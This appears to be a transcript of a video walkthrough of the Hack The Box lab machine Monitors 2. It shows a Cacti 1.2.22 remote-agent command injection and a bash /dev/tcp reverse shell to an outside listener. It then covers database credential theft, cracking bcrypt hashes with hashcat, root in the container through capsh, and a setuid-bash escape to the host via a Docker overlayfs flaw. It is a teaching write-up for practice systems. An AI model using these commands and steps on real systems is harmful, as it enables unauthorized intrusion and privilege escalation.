what's going on YouTube this is ipsec we're doing monitors 2 from hack the box which the exploitation was dead simple the foothold you exploit a cacti instance and it gets you a shell on a Docker container and you could use Metasploit I don't think the Metasploit module was at time of release but it came out shortly after we're going to over complicate it a little bit and do it manually just so we understand the exploit see what we can do when things go wrong but with that shell you can then pillage the database get some credentials that are used to SSH into the box and this is where the box starts to get tricky there is a email that points to a vulnerability and DACA and you actually have to go back down to the docker container find a prevask which is just a GTFO bin get root there and then you can drop a set uid binary there and since the host OS is sharing the file system you can just execute that set uid binary and get up to root and I call that tricky because it's very rare in a prevask where you have to go from the host system back down to a Docker to go back up to the host but either way let's just get into the box as always I'm gonna start with the end map so Dash SC for default scripts SV enumerate versions OA I'll put all formats put in the end map directory and call it monitors 2 then the IP address of 10 10 11.211 this can take some time to run so I've already ran it looking at the results we have just two ports open the first one being SSH on Port 22 and its Banner tells us it's an Ubuntu Server we also have HTTP on Port 80. it's better tells us its engine X running version 1.18 also on Ubuntu and looking at the title we have login to cacti or cacti I don't know how to pronounce that but let's just go over to the page so 10 10 11 211 and we get this login Banner we can try default credentials like admin admin I think maybe it's admin user or something but the key thing is we have this version 1.2.22 so I'm going to Google cacti122 um and I'll just add exploit to it and we get a heap of exploits now we could just go to GitHub and I think if we just ran this exploit it would magically work and we'd get a shell but we don't really learn anything through that so I'm gonna go take a step back we're not just going to run a POC blindly I'm gonna go look at these two articles let's see this one again is going to be code I'm going to go to this page has a description of the cve and it has a few things so it's talking about um host ID um let's see the module immediately attempt exploitation during exploitation the module sends a get request to remote agent.php so this is the script with the action parameter set to pull data and the exported four header set to the provided value for exported for IP by default 127001 in addition the polar ID parameter is set to the payload and the host ID and local ID are set to brute forced or provided values so this is what a lot of the scripts do they kind of just hard code it and if you just use the script you don't learn that much right so the first thing we're going to do is take this because it gives us the URL pretty easily and it has these IDs um and like a parameters statement and it just Brute Forces it but we're not going to use it we're just going to cheat get this payload and we're going to send this over to burp Suite and then kind of see how this works and we're actually going to go over to Metasploit because metasploits code um gently explains things better and they don't take a lot of things for um granted so if we just sent this payload it's probably going to error out because we need to put numbers here and since this says IDs I'm going to guess they are integers and maybe it didn't error we just see you're not authorized and if we remember we had the X forwarded foreheader that the description told us to set and it said set it to 127.001 to bypass authentication on this endpoint so now if we send it we just get um errors validation error for host ID see backtrace and doesn't really have that much we just get a bunch of Errors so let's just put integers for these since it is ID I'm going to do 0 we can do host ID of zero as well and then polar ID I'm going to do semicolon sleep plus one this plus is URL encoded for space and now if we send it we just get a blank array um I'm going to increment my host ID by one two three we don't really get anything if we increment this we get data back um do we get it back for first id2 no only when host ID is one and I set it to one I generally test for zero or one first it just depends where it starts counting right um if it starts at zero or starts at one in this case starts at one and the host ID is for itself and at this point um if you don't know what cacti is it's a I guess graphing application we Google cacti go to images you can kind of get an ID what it is um not exploit let's just Google cacti go to images and probably specify software and it takes a bunch of data from networking devices or whatnot and display as graphs so host ID is going to be the ID of the host and this is a really old version but it's a monitoring application so host ideas one is probably gonna be itself and then we have this piece and we don't know exactly what it's doing the script just brute force it and eventually it takes about a second to return because we have a sleep of one we do a sleep of two we go to two milliseconds right so we can go try this one more time that's two seconds one is one second and if we did ten it's going to sleep for 10 seconds so we definitely have code execution but my gripe is if you just go off these python modules you'll see it just Brute Forces until it works there's no logic here of it actually testing the exploit so we run exploit exploit is here we set a user agent it's going to set it payload let's see how does it get local data ID it's just brute forcing one to a hundred and sending them all so why did we get code execution on six we see it's 10 seconds there but we didn't get code execution on one and the answer is going to be this Ro D name but if you just did it by Python scripts you're probably out of luck if we look at this there is a metasplate module and if we Google for this and look through the actual Metasploit code we will see exactly what is happening so pull this up and generally speaking I know Mass Plate's frowned upon but whenever I see an exploit on Metasploit or just a random python script I'm going to choose the metasplate version because that's generally tested more it's kept more up to date it has more just a process around adding it it's not just some random person committing to GitHub and I started doing this around the time of like Eternal blue because a lot of people like that python script because you're not using metasploits you can pass oscp but that has a tendency to crash the SMB service where um Metasploit does not so I like using Metasploit especially when looking through code even though this is chances it's going to be Ruby it supports other languages now but you get an ID idea what it is so we have this exploit and it's going to Brute Force the IDS kind of just like what we saw with the python script but if we go to this definition of Brute Force IDs we'll see um right now it's just setting the variables making sure we don't do a thousand attempts because that would just take a long time and then it's going to enumerate let's see we'd send this remote agent request if we look at that we're in line 199 but all this does is send a get request set to exported four header and send this right and he even says when brute forcing this is just a random number but exploitation it's the payload so let's go back up to line 199 where that was and let's see unexpected response it's going to parse the body if it is array checking and now it's checking the rrd value and let's see so we have this variable exploitable rrd names and if it finds it in this list then it returns true so let's see exactly what this is and we have um these Rod names and uptime is one of them so there's probably going to be a few that we can actually exploit um and that's just this so if we kept going through this so like seven that's proc eight proc are these all going to be proc 20. 30 or 230 240. I don't know why everything is suddenly proc but what do we say six was the exploitable oh what changing polar ID that's why so seven is nothing eight is nothing six is uptime so I guess all these other rrds just are not deployed for this host ID but we got this we have code execution we waste enough time talking about it so let's just get a shell so I'm gonna go here and do bash Dash C then bash Dash I Dev TCP 10 10 14 8 9001 zero and one like that and then let's URL encode it so I'm going to highlight everything and then press Ctrl U H and we can send a shell so nclvnp 9001 send this payload and we have a shell let's do Python 3 Dash C import PTY PTY spawn bin Bash and Python 3 is on the box which python which python 2. so I don't think we have python on this box at all so we may have the script binary and script we can also use to do the same thing it's actually a little bit easier um let's do manuscript real quick just so I see the arguments we probably want to use C and I need out file as well um Dash capital O is out file so I'm going to do script Dash capital O devnol so we're not actually creating a log on the box of everything we did then we can do um let's see the next command is going to be Q for quiet and then bin Bash and now I can do sdty so Ctrl Z sdty raw minus Echo FG enter enter and we have a proper terminal here I'm just going to do the um rows and columns so rows 31 columns 121 rows 31 calls 121 export term is equal to X term so we can clear the screen and now we just have a shell on the cacti box so the very first thing I always do whenever I get shell on a web application is go check out the database so I'm going to do a fine Dot and I'm just going to grip for config and there is a include config.php so that's probably what I want so let's go into include and I can grab database on config.php and let's see we have username root password root so let's do MySQL Dash U root Dash B root and we can't connect to my SQL Server through the socket looking up we have a hostname of DB and at this point I should mention we are in a Docker container we can kind of tell we're in a container based upon the hostname I do LSA on slash we see dot Docker and um let's see ping DB ping is not there um I'm just gonna do a w get on DB I don't expect this to work but I'm testing for DNS so we see it's resolving DB to this IP address 172 1902 so DB does exist that again was in the config so I can go back to my MySQL command and I'm going to add a dash 8 for hostname and we'll specify DB root and now we're logged in so we can do a show tables um so databases it's probably gonna be cacti right CD cacti how do I do CD it's use cacti uh show tables and we probably want the user auth so I'm going to do a select star from user auth limit one I just want to get one ID right now and I like using backslash G because if I just do semicolon I can't read that but backslash capital G makes this a bit more human readable and this is why only limit one so I can see each field in this and I want username password name and email address so now I can do select username password full name email address from user auth I'm not going to do the backslash G because we don't have a lot of information here and I can easily eyeball this right so I can just copy this and then let's go save this so v um user auth we can make a directory cacti um the user auth paste and then I'm going to grep for pipe like this on user alt does this get me everything it does so I can just do an awk now and we can say print two this is one this is two this is three this is four so two colon four and then we can grab Dash V username to hide the first line and we'll output that to hashes and we have admin and Marcus I don't know what this guest is um that just looks like hex to me uh let's see if we go to decoder decode as hex I have no idea what this is um smart decode but I'm going to try cracking these hashes because I know what these are so let's send those over to the Kraken which is just a box on my network you can always use your computer to crack I wouldn't recommend cracking an AVM just because it's a CPU intensive process or GPU intensive and it can go very slowly um if you just use your host operating system definitely works uh the reason I don't is because I'm recording and it may just cause me to drop frames or other things so I just like always sshing off my box let's go into this and grab the credentials uh cat hashes you can just grab these two lines I'm going to V monitors 2 paste this in and then we can go dot slash cat uh hashes monitors two man I'm typing all over the place then opt wordlist Rock UDOT text and it's going to Auto detect the hash um it looks like it's some type of b-crypt format probably let's see uh oh we have to do dash dash username because we had the username colon the hash so we have a few options um two star that's probably going to be what it is um md5 pass like these don't look similar and it's form CMS e-commerce um I'm gonna guess 3200 first so let's do Dash mode 3200 and I really love that hashcat now has that auto detection feature I know it's been like one to two years maybe longer but gone are the times of just always having to consult the manual when you wanted to get a mode out um super nice so it is now cracking I can do s for status to see how long it's going to take and we already got one um the password is Funky Monkey so I'm going to do a let's see monitors two let's see dash dash username is it dash dash shell uh desk mode 3200 there we go and we can see Marcus has the password of funky monkey so let's try sshing in with Marcus uh let's go here SSH Marcus at 10 10 11 211. I'm gonna do Funky Monkey and we get logged in it also tells us Marcus does have mail um I always like just reading the mail if it's an actual environment it's probably not going to be anything special um but if it is root it may just be like failed logins things like that where you get IP addresses and things like that off of it but um if we look at it we have an email it looks like from administrator monitors2.hdb to all and we got a security uh Bulletin so the first one is talking about the Linux kernel before 5 11 14. if I do a u name Dash a we have five four zero one forty seven so um how Ubuntu does kernels is really annoying um some things put it here which is the minor number Ubuntu likes putting 147 here we can just look at the date of the cve and when this was compiled to see if it is relevant so let's copy this go over to Firefox Google uh May 14th and this is March 21st so it looks vulnerable because March is the third month and may is the fifth but keep in mind this is 2023 and this is a 2021 cve so this is definitely not vulnerable to the Kano provesque then we have this one it mentions cacti um I want to say we're like one two two two so this is also um probably not vulnerable if we go here but even it is we've already shelled this service so it is not interesting to us um I'm not sure do we hang the service by getting our shell that is weird okay we'll just move on um then we have this cve and this affects Docker and it wants Docker version 2109 so let's see what version of Docker we have if I do Docker dash dash version uh where I said probably 2109 it's 20 10 9 and we're at twenty ten five so we are vulnerable to this cve so let's do some quick research on this so if I just Google this cve it's going to talk about it and it's probably gonna give us an exploit script which we're not just going to run um the issue in this is the overlay FS permissions will um Traverse the host so let's see Docker overlay FS enables the container file system be layered on top of the host thus learning the host system access to manipulate files within the container in the case of this the overly permissive directory permissions enviralib overlay 2 enable unprivileged users to access and execute programs within the container leading to a potential prevask so we connect inside the container we make a set uid version bin bash and on the host we can execute it so for this to work we need to get root on this container because let's see if we do is it find Mount this is going to list where all the um Docker directories are so we have to be able to go into these directories so let's just do a lsla on this and this is a long directory path um this is just where the docker is and remember there's two Dockers at least that we know of there's DB and web so we want to make sure we get on the right container so let's go to slash and I'm going to go in temp and we're going to touch please subscribe so if we do this go in temp there's no files here so I'm going to do find Mount again and let's go to the other one lsla this slash temp and we do have please subscribe so we do have a way to get here so if I go in this directory or we can buy a copy The Bash off this right CP been bash to temp we do LS we now have Bash and we need to make this set uid so let's go um temp oh we have to escalate privileges so I'm going to do find slash Dash permission minus 4000 hide all error messages and looking at the set uid binaries we have cap sh and if we did a GTFO bins and I'm sure like Lin P's and all these things will highlight this binary if we look at it we have cap sh and we can set GID uid to zero and dash dash which will break out of Bash so we can just do cap sh dash dash uid equals zero dash dash GID equals zero and then Dash Dash and now we are magically root um the purpose of cap sh H let's just do man cap sh see exactly what it is Linux capability support to let's see it's a testing tool I guess but it's a legitimate tool so now that we are root if we go to temp we have bash so let's do CH own root root on Bash and now when I do lsla on this directory we have bash owned by root so you can see where this is going let's do chmod 4755 which will set this to be a set uid executable on bash and over here again the same thing and now we have this as a set uid so let's just go into this directory now and then we can execute bash with Dash p so it accepts our privilege and we can see her effective user ID is zero which is root so if I do CD slash root we can now get root.txt so that's going to be the Box hope you guys enjoyed it take care and I will see you all next time